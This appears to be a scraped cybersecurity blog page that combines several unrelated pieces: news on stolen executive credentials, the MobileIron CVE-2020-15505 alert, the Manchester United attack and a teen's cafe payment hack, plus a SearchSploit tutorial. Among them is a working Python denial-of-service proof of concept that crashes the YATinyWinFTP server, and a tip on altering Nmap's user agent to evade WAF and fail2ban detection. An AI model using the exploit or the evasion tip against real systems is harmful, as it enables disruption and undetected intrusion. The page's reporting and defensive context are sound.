An unknown hacker is selling Microsoft and Office 365 email account credentials of hundreds of C-level executives on an underground forum.
There’s no shortage of cybersecurity incidents, as is evident this year. Now, an anonymous hacker is reportedly selling Microsoft and Office 365 account data of hundreds of top executives in leadership roles from countries worldwide.
This data includes credentials (usernames and passwords) of executives such as the company president, vice president, chief operating officer (COO), chief financial officer, chief technology officer (CTO), chief marketing officer (CMO), and even the chief executive officer (CEO).
The data is being sold on an underground forum exploit.in, as discovered by ZDNet. Since exploit.in is off-limits to the general public, ZDNet confirmed the legitimacy of the account credentials with the help of an anonymous source from the cybersecurity community.
A Screen of the Ad on Exploit.in
The source obtained credentials of two accounts — one of them being the CEO of a medium-sized software company based in the U.S. and the other a CFO of a European retail store chain. According to the source, hundreds of other user credentials are put up for sale, each with a price tag hovering between $100 to $1500 per user account.
The seller refused to divulge how they got the data, but it is widely speculated that AzorUlt trojan was used. AzorUlt is used to obtain information from infected computers, called Azor logs. Cyber threat intelligence company KELA told ZDNet that the same malicious actor had previously shown interest in procuring these Azor logs.
The executives whose accounts have been compromised could also find themselves a target of business email compromise (BEC) attacks. In 2019, the FBI received 23,775 BEC attack complaints, which resulted in losses of more than $1.7 billion, totaling half of the total cyber crime-related losses in the year. Later, between April and May 2020 BEC attacks increased 200%, making it one of the most preferred and successful cyber fraud methods.
BEC is also the #1 source of payment fraud attempts on U.S-based organizations in 2019, wherein 75% of organizations were the targets of such attacks. Besides BEC attacks, credentials on sale also expose the account and the sensitive company information to external malicious actors and competitors.
The British National Cyber Agency has put out an alert on the MobileIron remote code execution vulnerability.
According to the alert, APT nation state groups and cybercriminals are actively exploiting this vulnerability to compromise the networks of organisations within the United Kingdom.
Earlier this year, in June MobileIron, a provider of mobile device management (MDM) systems, released security updates to address several vulnerabilities in their products. This included CVE-2020-15505, a remote code execution vulnerability, rated critical. MDM systems allow system administrators to manage an organization’s mobile devices from a central server, making them a valuable target for threat actors.
The NCSC is aware that Advanced Persistent Threat (APT) nation-state groups and cybercriminals are now actively attempting to exploit this vulnerability [T1190] to compromise the networks of UK organizations.
The Cybersecurity and Infrastructure Agency (CISA) in the US has also noted that APTs are exploiting this vulnerability in combination with the Netlogon/Zerologon vulnerability CVE-2020-1472 in a single intrusion.
This critical vulnerability affects MobileIron Core and Connector products and could allow a remote attacker to execute arbitrary code on a system. The MobileIron website lists the following versions as affected:
10.3.0.3 and earlier
10.4.0.0, 10.4.0.1, 10.4.0.2, 10.4.0.3, 10.5.1.0, 10.5.2.0 and 10.6.0.0
Sentry versions 9.7.2 and earlier
9.8.0
Monitor and Reporting Database (RDB) version 2.0.0.1 and earlier
A proof of concept exploit became available in September 2020 and since then both hostile state actors and cyber criminals have attempted to exploit this vulnerability in the UK. These actors typically scan victim networks to identify vulnerabilities, including CVE-2020-15505, to be used during targeting (T1505.002). In some cases, when the latest updates are not installed, they have successfully compromised systems. The healthcare, local government, logistics and legal sectors have all been targeted but others could also be affected.
Tom Davison, Technical Director – International at Lookout, a San Francisco, Calif.-based provider of mobile security solutions, notes, “The interesting story here is the assertion by cybersecurity agencies in the UK (NCSC) and the US (NSA) that nation state APT groups are actively exploiting these vulnerabilities, five full months after patches were issued. Mobile Device Management servers are by definition reachable from the public internet making them opportune targets. Offering a gateway to potentially compromise every mobile device in the organization, the attraction to attackers is clear. This highlights not just the importance of patching open vulnerabilities, but also the criticality of having a dedicated mobile security capability that is distinct from device management infrastructure.”
NCSC Conclusion
The NCSC strongly advises that organisations refer to the MobileIron guidance referenced in this alert and ensure the necessary updates are installed in affected versions. Organisations should also keep informed of any future updates to the guidance from MobileIron.
The NCSC generally recommends following vendor best practice advice in the mitigation of vulnerabilities. In the case of this MobileIron vulnerability, the most important aspect is to install the latest updates as soon as practicable.
Additionally the NCSC advices organisations to follow the NCSC guidance in the mitigation section at the end of this alert. UK organisations should report any compromises to the NCSC via the website.
For more information, please refer to the NCSC alert that we have linked multiple times.
Final thoughts
WHY on earth are Organisations neglecting Updates/Patches to software etc?
Let’s put it into perspective. MobileIron released Security updates in June 2020 for the above vulnerability plus other issues. The public POC (Proof Of Concept) surfaced September 2020. We’re now just about into December, and yet Organisations are allegedly being exploited with this vulnerability.
The end goal will inevitably be Ransomware, or Data breach, and to be completely frank, Organisations at this point, have nobody else to blame but themselves.
Deploying patches updates should be done regularly, weekly at the very least, quite clearly that’s not what is happening.
# Exploit Title: YATinyWinFTP - Denial of Service (PoC)
# Google Dork: None
# Exploit Author: strider
# Vendor Homepage: https://github.com/ik80/YATinyWinFTP
# Software Link: https://github.com/ik80/YATinyWinFTP
# Tested on: Windows 10
------------------------------[Description]---------------------------------
This Eyxploit connects to the FTP-Service and sends a command which has a size of 256bytes with an trailing space at the end.
The result it crashes
-----------------------------[Exploit]---------------------------------------------
#!/usr/bin/env python3
# -*- coding:utf-8 -*-
import socket, sys
target = (sys.argv[1], int(sys.argv[2]))
buffer = b'A' * 272 + b'\x20'
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(target)
print(s.recv(1024))
s.send(buffer)
s.close()
-----------------------------[how to run]-----------------------------
C:\> TinyWinFTP.exe servepath port
~$ python3 exploit.py targetip port
By default Nmap comes fully bundled with NSE (Nmap Scripting-Engine) a fully integrated scripting engine with many useful libraries.
The http library is very commonly used, however many people dont realise they are using the user-agent Mozilla/5.0 (compatible; Nmap Scripting Engine; http://nmap.org/book/nse.html)
This is obviously a value you wouldn’t like to be used when pen-testing, as it would give your presence away on the battlefield, as they say. Additionally, it is easily detected and blocked (Unique to Nmap’s NSE http library).
Furthermore, Mod Security, and many other WAF’s (Web Application Firewalls) etc will quickly catch on to what you’re up to.
For example a ModSecurity rule that detects and blocks this default user agent is:
With a good Sec setup on the server using ModSecurity, fail2ban etc would more than likely kick in, dropping your scanner’s connections.
According to the NMAP development team this value is left by “design” and that if you want to change it you have to use--script-args http.useragent="some ua" when launching your Nmap scans. The problem is that this is burdensome to add (and remember) everytime you need it.
NMAP How to change user agent:
You can find the default value in/usr/share/nmap/nselib/http.lua(At the beginning of the file, a couple of lines after the comments)
local USER_AGENT = stdnse.get_script_args('http.useragent') or "Mozilla/5.0 (compatible; Nmap Scripting Engine; http://nmap.org/book/nse.html)"
Here’s an example of a user agent that should be used in a default setting
local USER_AGENT = stdnse.get_script_args('http.useragent') or "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)"
You can set it to whatever you like, stealth is key, change it periodically etc.
InfoSec veteran? novice? confused? It’s a huge acronym.. “InfoSec” CyberSec? regardless, we should all know what Exploit-DB is, exploit-db is a website that provides a collection of several vulnerabilities and code exploits from around the world, otherwise known as PoC (Proof Of Concept) code.
SearchSploit Guide
Exploit-DB is not just a website, there is much more to it than that; Over time, exploit-db developers have created open source tools to facilitate users of all levels, so that the user can easily access the databases without even entering the exploit-db website.
What Is SearchSploit
One of those tools are searchsploit and today we will go over basic setup and usage. Searchsploit gives you the power to perform detailed off-line searches through your locally checked-out copy of the repository. It is an opensource security tool that stores exploit db files locally, so we can easily access exploits in the exploit-db without entering the actual website as we explained earlier
Installation Steps
On Unix systems, everything you need is either “coreutils” or “utilities” (eg bash, sed, grep, awk, etc.), and “git”. It is installed by default on many different Linux distributions, including OS X / MacOS.
If you are not using Kali Linux, the exploitdb package may not be available through the package manager in which case, you can continue to install the searchsploit package using above git command.
Command: apt update && apt -y install exploitdb
If you are using the standard GNOME build of Kali Linux, the “exploitdb” package is already included by default!
3. Next, we’ll use the command below so you can create a symbolic link in the “/ usr / local / bin” directory that points to searchsploit, allowing you to run it without providing the full path.
4. After completion, It’s time to update SearchSploit:
searchsploit -u
5. Install additional modules required to run some functions of searchsploit:
apt install -y libxml2-utils
Searchsploit help output
Example search output:
New POC’s, new exploits were released, how do I…
How to update searchsploit?
That’s fairly straightforward, also.
use:
apt update searchsploit
or
searchsploit update
Additional Example Usage
==========
Examples
==========
searchsploit afd windows local
searchsploit -t oracle windows
searchsploit -p 39446
searchsploit linux kernel 3.2 --exclude="(PoC)|/dos/"
searchsploit -s Apache Struts 2.0.0
searchsploit linux reverse password
searchsploit -j 55555 | json_pp
Basic Searching
Simply add any number of search terms you wish to look for:
--------------------------------------------------------------------------------------- ---------------------------------
Exploit Title | Path
--------------------------------------------------------------------------------------- ---------------------------------
Microsoft Windows (x86) - 'afd.sys' Local Privilege Escalation (MS11-046) | windows_x86/local/40564.c
Microsoft Windows - 'afd.sys' Local Kernel (PoC) (MS11-046) | windows/dos/18755.c
Microsoft Windows - 'AfdJoinLeaf' Local Privilege Escalation (MS11-080) (Metasploit) | windows/local/21844.rb
Microsoft Windows 7 (x64) - 'afd.sys' Dangling Pointer Privilege Escalation (MS14-040) | windows_x86-64/local/39525.py
Microsoft Windows 7 (x86) - 'afd.sys' Dangling Pointer Privilege Escalation (MS14-040) | windows_x86/local/39446.py
Microsoft Windows XP - 'afd.sys' Local Kernel Denial of Service | windows/dos/17133.c
Microsoft Windows XP/2003 - 'afd.sys' Local Privilege Escalation (K-plugin) (MS08-066) | windows/local/6757.txt
Microsoft Windows XP/2003 - 'afd.sys' Local Privilege Escalation (MS11-080) | windows/local/18176.py
--------------------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Result
kali@kali:~$
kali@kali:~$ searchsploit afd windows local
Note, SearchSploit uses an AND operator, not an OR operator. The more terms that are used, the more the results will be filtered out.
Elite Tip: Do not use abbreviations (use SQL Injection, not SQLi). Elite Tip If you are not receiving the expected results, try searching more broadly by using more general terms (use Kernel 2.6 or Kernel 2.x, not Kernel 2.6.25).
Title Searching
By default, searchsploit will check BOTH the title of the exploit as well as the path. Depending on the search criteria, this may bring up false positives (especially when searching for terms that match platforms and version numbers). Searches can be restricted to the titles by using the -t option:
kali@kali:~$ searchsploit -t oracle windows
--------------------------------------------------------------------------------------- ---------------------------------
Exploit Title | Path
--------------------------------------------------------------------------------------- ---------------------------------
Oracle 10g (Windows x86) - 'PROCESS_DUP_HANDLE' Local Privilege Escalation | windows_x86/local/3451.c
Oracle 9i XDB (Windows x86) - FTP PASS Overflow (Metasploit) | windows_x86/remote/16731.rb
Oracle 9i XDB (Windows x86) - FTP UNLOCK Overflow (Metasploit) | windows_x86/remote/16714.rb
Oracle 9i XDB (Windows x86) - HTTP PASS Overflow (Metasploit) | windows_x86/remote/16809.rb
Oracle MySQL (Windows) - FILE Privilege Abuse (Metasploit) | windows/remote/35777.rb
Oracle MySQL (Windows) - MOF Execution (Metasploit) | windows/remote/23179.rb
Oracle MySQL for Microsoft Windows - Payload Execution (Metasploit) | windows/remote/16957.rb
Oracle VirtualBox Guest Additions 5.1.18 - Unprivileged Windows User-Mode Guest Code Do| multiple/dos/41932.cpp
Oracle VM VirtualBox 5.0.32 r112930 (x64) - Windows Process COM Injection Privilege Esc| windows_x86-64/local/41908.txt
--------------------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Result
kali@kali:~$
kali@kali:~$ searchsploit oracle windows | wc -l
100
kali@kali:~$
If we did not use -t, we would have 94 (6 lines are in the heading/footer) results, rather than 9.
Removing Unwanted Results
you can remove unwanted results by using the --exclude option. We are also able to remove multiple terms by separating the value with a | (pipe).
Elite Tip: By doing: searchsploit linux kernel --exclude="(PoC)|/dos/" | grep ' 3.2', you’ll get an even “cleaner” output (sorted based on the version without any heading/footers).
Examining Nmap result
Nmap has a feature that let you save its output result in .xml format and we can identify each exploit associated with the Nmap XML file.
Nmap -Pn -n IP -oX output.xml
With the help of above command, we have saved the scanning result of Nmap in an XML file, so that we can search the exploit related to scanned port/services.
searchsploit -x --nmap output.xml
Examine an Exploit
Using —examine option enables examine parameter to read the functionality of that exploit with the help of $PAGER.
searchsploit 9542 --examine
We shall leave it there, for now.
Be sure to check more of our guides!Cybersecuirty is always the topic. we’re working on further enhancing the academy.
17-year-old boy allegedly hacked payment system of a cafe and transferred funds from membership cards to his own card.
Mumbai: A teenaged student allegedly hacked into the payment system of a cafe and used it to transfer funds from the membership cards of other customers into his own. The 17-year-old student was asked to undergo counselling for two years by a juvenile court in Mumbai.
The accused teenager is pursuing chartered accountancy and he cleared his Class 12 exams with more than 80 per cent. The incident came to light when the owner of the coffee shop approached the cyber police on September 28 and lodged a complaint.
Customer approached owner with grievances
A probe revealed that the shop gives membership cards to its customers that can be used to make purchases and earn rewards. The owner grew suspicious when one of the customers told him that the funds from his card were spent even as he did not use it.
The owner of the cafe then checked the payment system and spoke to other customers. The other customers also had similar grievances. The man then approached the police and a probe was launched.
The police traced the IP address of the accused to Odisha but the same was a false lead, The Times of India reported. The police then used technical surveillance to locate the accused and traced him from a housing society. The police, however, did not know which of the 36 flats belonged to the accused.
The cops then camped at the building for four days and confirmed that the 17-year-old boy was involved. On Thursday, a charge sheet against the accused was filed before the juvenile court. Allegedly, the teenage boy had taken tips from YouTube to hack into the payment system of the cafe.
The club insists that no fan data was compromised during the attack, which left staff unable to use some online functions.
A spokeman for the club said “The club is not aware of any fan data being accessed in the attack”
Manchester United are being assisted by the UK’s cyber security agency after an online attack left the club unable to fully restore its systems.
The club said it had been hacked last weekbut that it was not “aware of any breach of personal data associated with our fans and customers”.
It reported the attack to the Information Commissioner’s Office, as required by law.
Staff at the Premier League club still do not have access to email, and the National Cyber Security Centre (NCSC) is now involved.
A spokesperson said: “The NCSC is aware of an incident affecting Manchester United Football Club and we are working with the organisation and partners to understand impact.”Advertisement
The club would not say who was “responsible for the attack or the motives”.
“This attack was by nature disruptive, but we are not currently aware of any fan data being compromised,” it added.
“Critical systems required for matches to take place at Old Trafford remained secure and games have gone ahead as normal.”
The club could face a fine from the Information Commissioner’s Office if it’s found that any fan data has been compromised.
On 13 November, Ticketmaster was handed a £1.25m fine after it was judged to have failed to keep customers’ data secure in a 2018 attack.
The NCSC said earlier this month that it had defended the UK from more than 700 cyber attacks in the last year, adding that it dealt with three times as many ransomware attacks compared with the year before.
It also said that criminals were adapting their approach during the attacks, threatening targets that they might leak data publicly, unless a ransom is paid.
We use cookies on our website to give you the most relevant experience by remembering your preferences and repeat visits. By clicking “Accept”, you consent to the use of the cookies. Cookie & Privacy Policy
This website uses cookies to improve your experience while you navigate through the website. Out of these, the cookies that are categorized as necessary are stored on your browser as they are essential for the working of basic functionalities of the website. We also use third-party cookies that help us analyze and understand how you use this website. These cookies will be stored in your browser only with your consent. You also have the option to opt-out of these cookies. But opting out of some of these cookies may affect your browsing experience.
Necessary cookies are absolutely essential for the website to function properly. This category only includes cookies that ensures basic functionalities and security features of the website. These cookies do not store any personal information.
Any cookies that may not be particularly necessary for the website to function and is used specifically to collect user personal data via analytics, ads, other embedded contents are termed as non-necessary cookies. It is mandatory to procure user consent prior to running these cookies on your website.
